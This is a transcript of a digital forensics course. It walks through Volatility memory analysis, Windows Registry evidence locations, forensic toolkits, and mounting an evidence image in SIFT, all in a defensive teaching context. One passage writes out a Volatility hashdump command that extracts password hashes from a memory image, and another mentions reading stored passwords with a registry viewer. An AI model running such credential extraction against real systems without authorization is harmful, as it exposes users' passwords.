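Put together, that first command looks something like this; the capture here is assumed to be named example.vmem, since the demo just refers to it as the example virtual memory file, so substitute whatever your own capture is called:

./volatility_2.6_lin64_standalone -f example.vmem imageinfo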
And we're going to let that run and hopefully it will come back with some suggested profiles for us to look at.
Okay, so we can see what this has given us.
It's given us quite a bit of information but the important stuff that we're interested here are these suggested
profiles. And we can see it's given us two suggested profiles, Windows XP Service Pack 2, and Windows XP
Service Pack 3. So now we have a bit of an idea as to where this memory came from. There's a good chance it
came from a Windows XP's system. We don't know exactly which Service Pack but we've narrowed this down
really well. So now we want to try and find out a little bit more information. Now that we have the profile,
what we can do is if we go back up here to our help command, we can see this is where we ran the -h. You
can see we did -f with the FILENAME, filename to use when opening an image. Now we can use this --profile
command. And this is what we can use to load the profile. And now that we know which profile we want, we
can do that.
We're going to load it with this Windows XP Service Pack 2 profile at first. If that doesn't work, then we can
try again with the Windows XP Service Pack 3 profile. And the first thing that we're going to do is use this
pslist command. And that's going to print all running processes by following the EPROCESS lists. Basically,
it's going to give us a list of all the processes that were running at the time that the memory was taken. So our
command is going to look like this: our Volatility program, -f example to point to our memory file. And then we're
going to say --profile=, we're going to use one of the suggested profiles here. So what I'll do is I'll just copy
this and paste it here.
And then we're going to say pslist. And this has given us a list of all of the processes that were running at the
time of the memory capture. So we can see we've got the offset in the memory location.
The name of the file or the process System, smss.exe, csrss.exe, the process ID, the PPID, threads, Hnds,
Session, Wow64, and the Start time and Exit time of the process. So the primary information that you're
going to get out of this is the name of the executable, the process ID, which can sometimes be useful, and the start and exit
times of the processes. We can see here they started at 2012-07-22 at 02:42:32. Now, we've got a lot more
information than we started with. We know we're in a Windows XP system and we have a list of the processes that
we're looking at. Now, usually, the reason we're performing these digital forensics is because we've suspected
a malware infection. So there's a good chance that we are going to be looking at these individual processes
trying to examine them and find out are any of these malicious or are they all pretty much okay, there's nothing
suspicious going on. So in order to do that, what we want to look at next is what kind of network
communications are going on, what kind of connections are available in the system.
So in order to get a list of network connections, what we can do is run the same command: volatility with -f
pointing to our memory file. The profile is Windows XP Service Pack 2, and we're going to say connections
and see who this machine might have been talking to. So right here, we can see we have communication going
on from our local address of 172.16.112.128 going to a remote address 41.168.5.140 on port 8080. Now, that's
not a standard port, it's not going to be HTTP or HTTPS. So that's going to flag to me as suspicious
communication. So what I could do here is take this IP address, throw it into Google or whatever other
kind of information gatherer you have available to you, and find out whether this is a known command and control
server or malicious IP address. And then if it is, well, there's an indicator of compromise. And then the other
thing to note here is the process ID 1484.
So I'm going to go ahead and say there's a good chance that if that IP address is malicious, then the process ID
1484 is going to represent the malware executable that I'm interested in. And even if I can't confirm that IP address
to be malicious for sure, I'm still going to be flagging the process associated with process ID 1484 as
being suspicious. Another thing that might be interesting to us to look at is the command sockets.
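For reference, the two network-related runs follow the same pattern as pslist; as a sketch, and still assuming the capture is named example.vmem and that imageinfo suggested the WinXPSP2x86 profile:

./volatility_2.6_lin64_standalone -f example.vmem --profile=WinXPSP2x86 connections
./volatility_2.6_lin64_standalone -f example.vmem --profile=WinXPSP2x86 sockets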
So this will show us all of the active socket connections that were going on at the time that the memory capture
happened. And we can see here the associated process ID that is associated with that socket. So now we might
be narrowing in on the malicious executable associated with that communication. I do see that there are
process IDs associated here with some network sockets.
So I might flag these particular processes as more likely to be malicious than anything else. So I would
highlight these process IDs, go back to my process list, and maybe highlight those as potential malware with a
little bit more conviction than I had before. And we have also been able to gain a little bit more information
about our process ID 1484. We now have some information about the socket that it is making use of. So in
addition to finding some other potentially suspicious activity, we have narrowed down and gained a little bit
more information about some activity that we thought was suspicious before. But now we want to potentially
try and go and look and detect more about our malicious executables. So let's use this command psxview.
And what this does is it's going to give us an idea if any of these executables are not listed where they should
be.
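Again under the same filename and profile assumptions, the cross-view check is run as:

./volatility_2.6_lin64_standalone -f example.vmem --profile=WinXPSP2x86 psxview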
So in this case, let's look at this first one, winlogon.exe. It's true across the board, it's present in pslist, psscan,
thrdproc, pspcid, csrss, session, deskthrd, ExitTime. So I don't see anything immediately suspicious there about
that. What we generally are looking for is something where there is one false. Oftentimes the
false shows up in pslist because it's the easiest list to hide your malware from being listed in. So if we
see a false in this column and trues all across the board elsewhere, we have a pretty good idea that that is
malware, or at least something suspicious is going on and we should look further into that. Down here we see
some falses, three falses on the side here. Potentially that's suspicious, but it's not as convincing to me as a
single false here in this column. I might still flag it and we could look at those. One thing I do see is that there
is one false on the process csrss.exe in the csrss column, and the rest are true.
That does seem kind of suspicious with the single false and the rest being true. So I'm going to be adding
csrss.exe with process ID 584 to my list of highly suspected executables. And here we can also see that our
process ID 1484, which we are suspicious of, is explorer.exe. Now, that doesn't necessarily mean it actually is
Explorer, you can easily make your malware have the name explorer.exe. Unfortunately, it's true across the
board. So we haven't added any suspicion here, but we also haven't necessarily taken away any suspicion from
that executable either. This is where you start to build up. You're building up correlations all across the board
from this process list, through the socket connections, through to this psxview and trying to correlate malware
and find it in the memory. So to finish up, let's go back and look at the list of commands.
[Video description begins] He enters the command that reads: ./volatility_2.6_lin64_standalone -h. [Video
description ends]
You can see there are a ton of commands that we haven't used today that could still be extremely useful to you
in various cases. For example, if TrueCrypt is used, you could try to get information there. Among the other potentially
useful commands, this hashdump one is nice. You could try to find out if there are any password hashes that it could
extract from our memory file. Here's the connections command that we used earlier. And so you can go
through this list and find out commands that are useful to you and then go from there. So Volatility is very,
very useful to us when we're performing digital memory forensics.
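As an example of one of those extra plugins, a password-hash extraction run would look like the following sketch, using the same illustrative filename and profile as before; note that some versions of the plugin also want the SYSTEM and SAM hive offsets passed in explicitly, so check the plugin help if the simple form comes back empty:

./volatility_2.6_lin64_standalone -f example.vmem --profile=WinXPSP2x86 hashdump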
Objectives
describe the Windows Registry and recognize the valuable information stored within
[Video description begins] Topic title: Windows Registry. Your host for this session is Peter Adamson. [Video
description ends]
In this video, we're going to provide an overview of the Windows Registry and recognize the valuable
information that's stored within it. So what is the Windows Registry? Well, at its essence, it's basically just a
file system. And it consists of a collection of what we call hive files, and these hive files are sets of key-value
pairs. So you have a certain key, it's got a value associated with it, you can modify that value and it will have
an effect on whatever the key is associated with. And then there are hierarchies of these keys and sub-keys that
you go through and go into and modify in the registry.
And a lot of the actions that you take on a day to day basis in a computer will be logged in the registry files. So
to understand the file system and the hierarchy that's contained within the Windows Registry, we have to have
an understanding of how it's laid out. So you can think of it as analogous to your C drive. You go into your C
drive and then under your C drive, you have the options of Program Files and Users, and you can keep
navigating to your sub-directories from there. And it's very similar within the registry. And just like in a file
system, we're going to go digging through the registry looking for points of interest. And some of the most
common folders or sub-folders that we're going to look at in the registry are the System folder, Software
folder, Security, and SAM. So you'll find these each under one of the top-level hives. And these are going to be
the keys that we're going to look at, along with their associated sub-keys.
Now there's a lot more contained within the registry and oftentimes you will go beyond just these four keys.
But these are four very common, very useful keys in the registry. In order to analyze the Windows registry, we
need to have a way of getting access to a copy of that registry. This is where we get to the acquisition of
registry files. And we need to do that so that we can preserve the registry for future analysis and do an analysis
of it without having to be on the target machine itself. And this isn't necessarily a trivial task, because the
information stored in the registry relates to the configuration of a
system, and systems are highly dynamic, so the Windows Registry is constantly changing. But luckily there
are a wide range of tools available to us as investigators to go out and acquire these registry files. And some
examples are FTK Imager and EnCase, and these are both software packages designed to help us acquire and analyze
registry files.
So now that we have a pretty good idea of what the registry is and how it's laid out, let's look at how that
hierarchy works from top to bottom. So we have our hives and those are root folders, and we call them the
hives. And they're at the very top. And then once we expand those and start digging in, we have sub-folders
which we call keys. And they have their own associated values as well as sub-folders within them that we call
subkeys. And those subkeys then have associated values. And then we go on like that, digging from top to
bottom. So we have hives, keys, then subkeys. So our final piece of the puzzle in the registry hierarchy is, what
are hives? Well, there are five hives. We have HKEY_CLASSES_ROOT or HKCR, HKEY_USERS or HKU, HKEY_CURRENT_USER or HKCU, HKEY_LOCAL_MACHINE or HKLM, and HKEY_CURRENT_CONFIG or HKCC.
Objectives
navigate the Windows Registry and use it to locate changes made to a system
[Video description begins] Topic title: Locating Evidence Within the Registry. Your host for this session is
Peter Adamson. [Video description ends]
In this video, we're going to demonstrate using the Windows Registry to perform digital forensics and
investigation. The Windows Registry is, you can think of it as a configuration file. It's designed to store
information about the hardware and software on a system, user activities, programs that are operating.
Basically, anything about the system can be found in the registry. If you know where to look, you can find info
about user activity, system devices, installed software, and more. So the registry can be great for answering the
questions of what happened during an incident? When did the incident happen?
Where on the system did the incident happen? And how did the incident happen, when it comes to malicious
attacks? So to open the Registry Editor in Windows, we can go and
[Video description begins] The Windows Desktop screen displays. [Video description ends]
[Video description begins] He enters the regedit in the search bar which opens, after selecting the Start
menu. [Video description ends]
And that's where we want to go to start in our investigation into the registry.
[Video description begins] A window titled: Registry Editor displays. The left pane contains a list of folders.
The right pane displays currently selected folder details. [Video description ends]
So I'll take us back up here to the root. So when you first open the registry, you're met with five root directories
called hives. We have HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE,
HKEY_USERS, and HKEY_CURRENT_CONFIG. Each one of these stores different types of values and
different information about the system, and you can find valuable information in all of them. So effectively,
these are storing keys and their associated values. So you can see here on my root key, I have the default and
the value's not set.
And then when I expand it, I have all of these different subkeys, all of which contain their own information. So
if I choose one at random here, .386, this has this information here. And I can expand it and go to another
subkey of this subkey, PersistentHandler, and get this value here. Now, if I double-click on to a value, I can
change the data associated with a value.
[Video description begins] A dialog box titled: Edit String displays. It contains two fields, namely: Value name
and Value data. The OK and Cancel buttons display at the bottom. [Video description ends]
In digital forensics, I'm not going to be doing that because I don't want to be modifying anything here, I'm just
going in and performing an investigation. So we're not going to be able to show all of the different values that
you might be looking for when you're going into forensics.
But I will show you some of the more common ones where you could start to look. And then hopefully what
that will do is lead you on to deeper and deeper learning about how you can use the registry even further. So
the first thing that I often look for is signs of persistence. And what I mean by persistence is malware that has
embedded itself into a system so that it is auto starting when a machine starts up. Rootkits do this or persistent
backdoors. So I want to try and see if I can find one of those running on a machine. So in order to do that, I'm
going to navigate to HKEY_LOCAL_MACHINE,
[Video description begins] A list of folders appear underneath, including: HARDWARE, SAM, SECURITY,
SOFTWARE and SYSTEM. [Video description ends]
[Video description begins] The list of folders inside the selected folder appears underneath. This occurs for
each folder the host selects. [Video description ends]
And then I'll go down through SOFTWARE and Microsoft to Windows, and then I'll go to CurrentVersion. And then I'm going to go down to
Run. And what we see here are lists of files and executables that are set to start up automatically when a
computer boots up.
So if we see here anything that looks suspicious, then we would start to go into that and ask why is this
executable starting up on startup? Does it need to be or is this a potential rootkit? So this is a good place to
look. We can also go to the RunOnce. This is another area where rootkits could end up being.
[Video description begins] The RunOnce folder is present beneath the Run folder. [Video description ends]
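If you prefer the command line to the Registry Editor window, the same autostart locations can be listed with the built-in reg tool; a minimal sketch, run from a Windows command prompt on the machine being examined:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

Each line of output is a value name, its type, and the command that will be launched at startup, which is exactly what we're eyeballing here in the editor.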
Another place where we could go, we could go to, and I'll scroll back up here and condense some of these.
We're going to go to HKEY_LOCAL_MACHINE, and then we're going to go to SYSTEM. We're going to go
to CurrentControlSet, and then we're going to go to Services. So Services is a great way to get information
about any service that might be running on a machine in general. This will have a full list of any installed
service on a computer. Now, another thing we often want to know about is, how did a piece of malware or an
incident start to occur?
Where did it originate from? And oftentimes a pretty common attack vector is through some piece of portable
media, like a USB stick or an external hard drive that got plugged in and a file was transferred. So we
oftentimes want to know, did a piece of external portable media get plugged into this machine? And the
registry can tell us that as well. So if we go to HKEY_LOCAL_MACHINE, and then we go to SYSTEM, and
we go to ControlSet001. We go to Enum, and then we go to USBSTOR. This shows us a list of all the devices
that have been plugged into this machine.
So we can see we've had a USB stick plugged in here, and we can get all of the different information
associated with that USB stick here. So if a certain USB stick was confiscated from a criminal or from a
suspect during an investigation, you could use this information to prove that the USB stick had been plugged
into the machine.
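The command-line equivalent, again as a sketch, is a recursive query of that key:

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR" /s

This dumps every USB storage device instance the machine has recorded, including the vendor and product strings and the serial numbers that let you tie a physical stick back to this machine.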
Similarly, for external devices, we could go to HKEY_LOCAL_MACHINE, go back to SYSTEM, and we'll
go to MountedDevices. And this gives us information about all of the devices that would be mounted on a
machine. So if somebody put in an external hard drive, then you would see that here. We might also like to see
the browsing URLs of a user, so find out what URLs, what places on the Internet they've recently been to.
Because then we might be able to see if they visited any malicious websites, or if something else has been
visiting malicious websites on their behalf or malicious URLs. So to do that, we can go to
HKEY_CURRENT_USER, and then we can go down to Software.
And then we go to Microsoft, and we go to Internet Explorer, and then we click on TypedURLs. And here
we can see any information about URLs that were visited by a user. If the attack was relatively recent, we
might also be interested in seeing the recent documents that might have been opened or used. So again, we can
go to HKEY_CURRENT_USER, we go down to Software, and then we go to Microsoft. And then we go to
Windows. And we go to CurrentVersion. And then we go to Explorer. And we click on RecentDocs. And we
can see here, information about all of the recent documents that have been opened on this machine. So if you
were interested in Microsoft Word documents, we could go here to .docx.
This is going to be all of our Microsoft Word documents. I could double-click here, and we can see the most
recent
[Video description begins] A dialog box titled: Edit Binary Value displays. It contains two fields, namely:
Value name and Value data. The Value data field contains a list of results. The OK and Cancel buttons display
at the bottom. [Video description ends]
information about the most recent file that's been used. You can see it in the binary format, hex, and ASCII
over here on the right. And other things you might be looking for are things like .tar files. Generally on
Windows, .tar should not really exist or be run. So any kind of .tar file is going to be somewhat suspicious to
see on your machine. So those are good indicators there. If we wanted to see what kind of networks a machine
has been connected to, we could go to HKEY_LOCAL_MACHINE. Go to Software. Go to Microsoft. Go to
Windows NT. Go to CurrentVersion, which we've already expanded into.
Go to NetworkList. And then go to Profiles. And then we'll see here we've got a list of all of the different
profiles; these are the different networks that this machine has connected to. So if you needed to prove that a
certain machine was on a certain network at a certain time, this is where you could go to do that. So this is just
a small taste of what you can get out of the Windows Registry. It's a very valuable tool when it comes to
digital forensics and something that any investigator needs to have in their toolkit.
Objectives
differentiate between Windows Registry tools and the techniques used for analyzing changes to the
registry
[Video description begins] Topic title: Registry Analysis Tools. Your host for this session is Peter
Adamson. [Video description ends]
Once we're at the point where we are going through the Windows Registry system and ready to do forensic
analysis on a Windows Registry, we need to be able to have a good idea of what tools and techniques we can
turn to in order to facilitate the analyzing of that registry. The first tool that I'm going to talk about is Registry
Viewer. Registry Viewer is a tool provided by AccessData. And the nice thing about
Registry Viewer is it's going to let you view the contents of any registry. So the default Windows Registry
Viewer is limited in that it can only look at the current computer's registry.
Whereas with Registry Viewer, you can load up any registry file and analyze it that way. And also you can get
into the protected storage that has things like your passwords, usernames, other critical information that you
might not be able to get from the regular Windows Registry Viewer. So it provides a lot more power at your
fingertips than a standard baked-in Registry Viewer to the Windows operating system. Another nice tool for a
forensic analysis of a registry is RegRipper. So this is an open-source tool written in Perl. And it's designed to
extract key values and other information out of a registry for you. So basically, you would point it at a hive,
say the system hive, and then try and extract relevant key data out of that hive.
So you can get the keys, values, and the data associated with it. And the final tool that we'll talk about which
can be really nice for analyzing a registry is Registry Browser. So again, this is aimed specifically at Windows
registries. And this is a nice tool because it looks at the registry files stored on the disk, re-compiles them into
its own complete Windows Registry. And then it allows you to search through the entire registry as opposed to
going through on a hive-by-hive basis. So it provides an almost database-like, searchable tool for searching
your registry which can be extremely convenient.
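To give a feel for RegRipper specifically, a typical run points the rip script at an exported hive file and a plugin profile. The paths below are purely illustrative, and the exact flags can vary between RegRipper versions, so treat this as a sketch rather than a definitive invocation:

rip.pl -r /cases/evidence/NTUSER.DAT -f ntuser

This walks the exported NTUSER.DAT hive with every plugin in the ntuser profile and prints the extracted keys and values to standard output, ready to be redirected into a report file.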
Objectives
differentiate between categories of digital evidence, including computer, mobile, network, and
database
[Video description begins] Topic title: Categories of Digital Evidence. Your host for this session is Peter
Adamson. [Video description ends]
Digital forensics is the process of capturing or preserving forensic data of a piece of evidence such as a
suspected compromised computer or a computer that's been used to perform malicious activities, and then the
subsequent analysis of that captured data. So when it comes to this field, there are a lot of different categories of
evidence that we can collect. And we need to go over how to differentiate between these different categories of
digital evidence. So we're going to talk about, in this video, what the different categories are. The first category
of digital evidence or forensics is computer forensics. Computer forensics is one of the more widely known
categories.
It's something that a lot of people are familiar with. It's the first thing that comes to mind when a lot of people
think about digital forensics. And it deals with the analysis of memory, hard drives, system logs, anything that
you could pull from, say, a confiscated laptop or desktop computer. So you're going through and looking for
maybe trace evidence of deleted files or the presence of malware or something that would indicate towards
what you are trying to prove. The next category of digital forensics is mobile forensics. So this is dealing with
cell phones, tablets, devices that have a built-in communication capability and can be portable and taken and
generally move around quite a bit.
And the tools that you use for mobile forensics, there's a lot of overlap between mobile and computer forensics
and the tools that you use. But there's a difference in how you use them. And there's a lot more nuances to
mobile forensics. For example, with a desktop computer, it's less likely that that desktop computer has been moving around
and logging into many different wireless access points. But for a cell phone, it's a lot more likely that that cell
phone will have gone and hit many, many different WiFi access points. So it's a little bit different in how you
approach the device. The next category that I want to talk about is network forensics. Network forensics is
generally built around the analysis of network traffic, like using packet captures or PCAP data to detect
intrusions or malware communicating on the wire between machines.
So this is where you're going in setting up your mirror ports on switches or your packet capturing devices and
outputting them to some sort of packet analysis tool like Wireshark. Next up, we have database forensics. So
this is the analysis of data and metadata within databases, things like Microsoft SQL, Oracle, other databases,
PostgreSQL. It doesn't really matter what the type of database is; the forensics around it and the techniques that you use are going to be
similar. When we talk about the data, this is the records that
are actually contained within the database. We go in and find out whether any records have been modified, added, or
removed, and whether somebody's been meddling in the database. And then the metadata is looking at things
like the time when a transaction occurred, looking to try and isolate when an attack or breach might have
happened, and any kind of data associated with the data in your database. At the end of the day, regardless of
what type of digital forensics you're doing whether you're doing computer forensics, network forensics, you're
still going to be producing digital evidence.
So once we have our evidence, we need to have a way of classifying that evidence. So the classifications are
based on a couple of things. One is the source. This is metadata associated with where the data came from.
So things like the computer it was lifted from or the network that it was contained in. You also have metadata
associated with certain files, like a picture taken on a camera on a phone will oftentimes have geo data
associated with it. So this is where you can start to classify physical location data.
This is the kind of example of source data that we would classify for digital evidence. And then we have to
classify it based on the format. So it's very important that digital evidence be maintained in its original format.
Whatever it was obtained in, it should also be stored in that format, just to maintain the authenticity and to
have as little corruption as possible within the handling of the evidence. And the type of data, are we dealing
with a spreadsheet or are we dealing with a database or a Word document? Are we dealing with an executable?
That's an example of how we classify evidence based on type.
Objectives
outline how to gather digital evidence, including identification, collection, acquisition, and
preservation
[Video description begins] Topic title: Gathering Digital Evidence. Your host for this session is Peter
Adamson. [Video description ends]
How do we go about gathering our digital evidence? Well, the first step when trying to gather digital evidence
is identification. Identification is really the process of searching, where our digital forensics analyst is going
into a cyber incident and searching for the affected machines or the perpetrating machines. And then trying to
detect any malicious activity that's been on those machines and finally, documenting their findings. So this is
the first step. You can think of identification as being similar or analogous to the act of triaging.
Once our identification stage is complete and we're satisfied that we have sufficiently identified all relevant
points to our forensics case, then we move on to the actual collection of what we've identified. So this is where
anything that's been identified in the identification stage needs to be collected in some way and, ideally,
transferred to a laboratory for analysis. In certain cases that can't be done, and you have to do your analysis on site,
so you transfer it to your analysis machine instead. But either way, this is where you start to go in and
actually grab what's relevant to you. So this is where you're going to be grabbing registry samples or memory
captures or packet captures. There are a variety of different ways that we'll collect or acquire our digital
evidence. One common way is disk-to-disk, so copying a physical hard drive to another physical hard drive
and taking that away for logical analysis.
Disk-to-image, so using some sort of imaging software to create an ISO image or some other kind of workable
image to copy a disk into that file format. Logical disk-to-disk, if we're dealing with any virtual memory
segments or logical volumes, then we'll try and copy those to our physical disk. And finally, data copy of a file
or folder, we'll use this where storage of the entire disk is infeasible either due to the large size of that disk or
some other reason. So in that case, we will just isolate small amounts of data, such as a file or folder and
capture that. And then finally, once we have all of our digital evidence collected, we need to go about the
process of preservation. Making sure that all of the digital evidence that we've collected is securely stored both
physically and digitally.
So we want to make sure it's in a physically secure location and that we have sufficient backups for disaster
recovery and redundancy. And we also want to make sure the data is stored in such a way that it can't be
altered, or that there would be some sort of telltale sign if it was altered. So we need some sort of non-repudiation
techniques there. And then once that's done, we have gone about the process of collecting our digital evidence.
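As a small, hedged illustration of the acquisition and preservation ideas above, a disk-to-image copy plus an integrity hash might look like this on a Linux workstation; the device name /dev/sdb and the output paths are illustrative only:

# Disk-to-image acquisition of the suspect drive
dd if=/dev/sdb of=/cases/evidence/suspect_drive.dd bs=4M conv=noerror,sync

# Record a hash at acquisition time...
sha256sum /cases/evidence/suspect_drive.dd > /cases/evidence/suspect_drive.dd.sha256

# ...and re-verify it later to show the image has not been altered
sha256sum -c /cases/evidence/suspect_drive.dd.sha256

In real casework a dedicated imager behind a write blocker is preferred, but the principle is the same: image once, hash immediately, and verify the hash every time the evidence is handled.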
Objectives
identify tools available for computer forensic analysis and their features
[Video description begins] Topic title: Computer Forensic Analysis Tools. Your host for this session is Peter
Adamson. [Video description ends]
Now let's look at and differentiate between the various tools that are available to us for computer forensics
analysis. The first one we're going to look at here is the SANS Investigative Forensic Toolkit or SIFT. We're
going to touch on SIFT in more detail later, so we're just going to go over it briefly here. But SIFT is a really
nice toolkit for incident response and forensic research. And the toolkit itself is a collection of various different
tools all put together into one convenient package for you to use as an analyst for these purposes of incident
response and research.
And the idea of SIFT is that it can help you provide incident response and forensics across a wide variety of
different systems. Our next tool is The Sleuth Kit or TSK. And once again, we're dealing with a collection of
forensics tools all put together into this kit called The Sleuth Kit. It's open source, and it's got a combination of
Unix and Windows-based forensics tools. And it's really designed and aimed at analyzing disk images and
recovering files. So these disk images will be images that you've recovered from a victim machine or an
attacking machine. And you're trying to analyze them and get files back off of them that might have been
deleted or are otherwise inaccessible. And the nice thing with The Sleuth Kit is it has support for a huge variety
of file systems.
So there's a good chance that if you've pulled a disk image out of a machine, The Sleuth Kit is going to be able
to support it. Next up, we have X-Ways. And X-Ways is a complete forensic suite designed specifically for
Windows systems. So anything Windows XP, 7, etc., that's where you're going to choose X-Ways. And the
nice thing that this tool has going for it is its portability. It's designed so that you could put it onto a bootable
USB stick, move it around, plug it into a machine. And then you can use this tool to take disk images and
clones and then analyze those images all from the same tool. So it's very convenient in that way. And the final
tool that we're going to talk about is called Caine, spelled C-A-I-N-E. And Caine is a full Linux distribution.
So you can install this as a standalone system. Or, more commonly, you could put it onto a bootable USB or
CD and then move it around in that way. And Caine comes with both command line and GUI-based options.
So you can sort of use it however you're familiar with if you prefer command line or GUI. And it also comes
packaged with other common forensics apps like Wireshark. And Caine is really, really nice because it can
really do everything. It's extremely powerful. It runs across multiple different systems for your forensics,
Windows, Linux, and it's a really nice sort of all-around tool to have in your back pocket.
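To give a flavour of what working with one of these kits looks like in practice, here is a hedged sketch of a short Sleuth Kit session against a disk image; the image name, partition offset, and inode number are all illustrative:

# List the partition layout of the image
mmls /cases/evidence/suspect_drive.dd

# List files and directories in the file system that starts at sector offset 2048
fls -o 2048 -r /cases/evidence/suspect_drive.dd

# Recover the contents of a particular file by its inode number
icat -o 2048 /cases/evidence/suspect_drive.dd 1284 > recovered_file.doc

The other suites offer comparable functionality through their own interfaces; the point is simply that a handful of commands takes you from a raw image to recovered files.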
Objectives
[Video description begins] Topic title: SANS Investigative Forensic Toolkit (SIFT). Your host for this session
is Peter Adamson. [Video description ends]
Now, let's look at an overview of the SANS Investigative Forensic Toolkit or SIFT. So SIFT is an open source
tool. It's freely available from SANS. You can download it and either build it and compile it yourself, or use
their prebuilt operating system and deploy it as a virtual machine. It helps you with incident response through
bundling together many of the free and open-source forensics tools available on the market into one convenient
location. And the nice thing with SIFT is that even though it's free, it competes with the proprietary systems
that are out there in the market for forensics now. And in many cases, it actually outperforms them.
So what are the keys features of SIFT? Well, it's a 64-bit base system. And it's designed in such a way as to
optimize memory usage so that when performing comparable forensics tasks, you can get away with a much
lighter weight or less powerful system using SIFT than you would have to have with another forensics tool. It's
always got the current forensics tools and techniques because it's continually updated. It also comes with its own
auto-update tools, so you don't really need to keep checking which tool is now out of date. You
just have to run your automatic updater, and it'll pull in the updates and current forensics tools for you. It's
ready to deploy as a virtual machine, which it's always nice to be doing your forensics on a virtual machine.
The actual operating system that it runs on is an Ubuntu 16.04 Base. And when it comes to compatibility, it's
compatible with both Linux and Windows, as well as having a wide range of file system support when it
comes to image carving and file analysis. And it comes with a nice SIFT command-line interface installer for
sort of intuitive installation.
Objectives
[Video description begins] Topic title: Analyzing Evidence Using SIFT. Your host for this session is Peter
Adamson. [Video description ends]
In this video, we are going to show how to mount forensic evidence using SIFT.
[Video description begins] The Desktop screen displays. It contains various files and folders. [Video
description ends]
So here in front of you, I'm working on the pre-packaged SIFT virtual machine. You can download this from
the SANS website. You can also build the machine from scratch if you prefer doing it that way, but I have used
the OVA download to run the actual SIFT workstation. So SIFT is a collection of free and open-source
forensics tools used to do incident response and investigation. And we are going to show how to mount
evidence files.
Mounting evidence files is the first step in order to carry out the wide variety of forensic analysis techniques
used by forensic investigators in order to investigate cyber attacks. We're not going to go into all the different
analysis techniques that would go on after the evidence has been mounted. But this will show you the first step
which is getting that evidence mounted. So I have downloaded here two sample evidence files.
[Video description begins] The Explorer window titled: Downloads displays. It contains two files, namely:
nps-2008-jean.E02 and nps-2008-jean.E01. [Video description ends]
So you can see it's got a .E01 format here on the end of this nps-2008-jean.E01 file. E01 stands for EnCase image
file format, and it's an image file format that contains digital evidence such as disk images and copies of local
files. Basically, this is something that has been ripped off of a machine that we suspect has had an incident.
And we've collected it, in this case, in this file format, and this is what we'll use to investigate.
So what I'll do is I'll move these to the desktop. And I'm going to make a new folder here called evidence.
[Video description begins] He right clicks on the Desktop. A dialog box titled: New Folder displays. It
contains a text box labelled as: Folder name. The Create button displays at the top right corner. [Video
description ends]
And then we'll put the files in there. That's where we'll work out of.
[Video description begins] The Explorer window titled: evidence displays. It contains two files, namely: nps-
2008-jean.E02 and nps-2008-jean.E01. [Video description ends]
[Video description begins] The terminal window displays. It displays the following folder path:
/Desktop/evidence. [Video description ends]
Now, we want to mount our evidence file. So in order to do that, we are going to elevate ourselves to super
user privileges with the command sudo su.
[Video description begins] The command reads: sudo su. [Video description ends]
And what we're going to do is use the command built into SIFT called ewfmount. And then we are going to
point it to our .E01 file, nps-2008- jean.E01.
[Video description begins] The command reads: ewfmount nps-2008-jean.E01 /mnt/ewf/. [Video description
ends]
And we are going to put that into /mnt/ewf. Okay, and now if I were to do an ls on that directory, we can see
we have ewf1.
[Video description begins] The command reads: ls /mnt/ewf/. [Video description ends]
This is now set up and formatted as the type of file system that we can actually mount, which is what
ewfmount has done for us. Now before we go ahead and mount that file system, we want to get the offset value
for our mount. To find the offset value, we're going to use this command, fdisk -l, and then we're going to
point to our ewf1. So we'll go /mnt/ewf/ewf1.
[Video description begins] The command reads: fdisk -l /mnt/ewf/ewf1. [Video description ends]
And what we're looking for here is this start value right here, so it's 63. Now these are in sectors of 512 bytes. So our
offset value is going to be 63 times 512. So what we're going to do is we're now going to go ahead and mount
that file. So our mount command is going to be mount -o ro (read-only), loop, show_sys_files,
streams_interface=windows. And then we're going to direct it to /mnt/ewf/ewf1. For that, we're also going to
put in that offset that we found.
[Video description begins] The command reads: mount -o ro, loop, show_sys_files,
streams_interface=windows, offset=$((63*512)) /mnt/ewf/ewf1 /mnt/windows_mount. [Video description ends]
So our offset is going to equal, we're going to make this a formula. So we're going to say 63 times 512. And
then we're going to put our destination mount point which is going to be /mnt/windows_mount. Okay, and now
we have mounted our evidence file. So if I navigate to /mnt/windows_mount
[Video description begins] The command reads: cd /mnt/windows_mount. [Video description ends]
and I do an ls, here is the information associated with our forensic system.
[Video description begins] The command reads: ls. [Video description ends]
At this point, we have successfully mounted the evidence file. And we can go about the further analysis
techniques that we would want to go and do for our forensics.
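Pulled together, the whole sequence from this demo looks roughly like this. The evidence filename matches the sample used here, the mount points are the ones created on the SIFT workstation, and the offset of 63 sectors came from the fdisk output, so check your own fdisk listing rather than reusing that number; the unmount steps at the end are the usual cleanup rather than something shown in the video:

sudo su
ewfmount nps-2008-jean.E01 /mnt/ewf/
fdisk -l /mnt/ewf/ewf1
mount -o ro,loop,show_sys_files,streams_interface=windows,offset=$((63*512)) /mnt/ewf/ewf1 /mnt/windows_mount
ls /mnt/windows_mount

# When the analysis is finished, unmount in reverse order
umount /mnt/windows_mount
umount /mnt/ewf

Note that 63 times 512 works out to an offset of 32256 bytes, which is where the first partition begins inside the image.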
Objectives
[Video description begins] Topic title: Course Summary [Video description ends]
So in this course, we've examined computer forensics analysis tools, techniques and best practices to use when
performing cybercrime investigations. We did this by exploring packet capturing and network forensics and
vulnerabilities. How to gain intelligence from an attack using packet capturing, and how to reconstruct artifacts
and files from a PCAP file using Wireshark. How to work with volatile data and compare tools for conducting
analysis of a computer's memory. How to use the Volatility Framework to process an extraction of computer
memory.
The Windows Registry and the information it contains and how to navigate the Windows Registry to locate
evidence. Windows Registry tools and techniques for analyzing registry changes. The categories of digital
evidence, techniques to gather digital evidence and various tools for performing computer forensics analysis.
And the SANS Investigative Forensics Toolkit, or SIFT, and how to mount evidence using SIFT. So in our
next course, we'll move on to explore Cyber Ops Windows device hardening.
Security Programming: Command Line Essentials
This 14-video course explores how to navigate a Linux command-line environment by showing learners how
to use its most common tools, including text editing and processing, file monitoring and comparison, and
package management. You will examine the common properties of the command line environment, including
the bash shell, its properties, and the features of the PowerShell environment. This course next demonstrates
how to perform text editing using commands such as nano; how to use the Linux vi editor and the Linux ed text
editor; and text processing using commands such as sed, awk, and cut. You will learn how to perform repeat
actions using the bash shell history, and perform process control tasks such as ps and kill. Then learn how to
use the command line to schedule jobs, perform file and command monitoring, and perform file comparison
using the diff command. Finally, this course demonstrates how to redirect the inputs and outputs of commands
and files, and perform package management tasks by using the apt command.
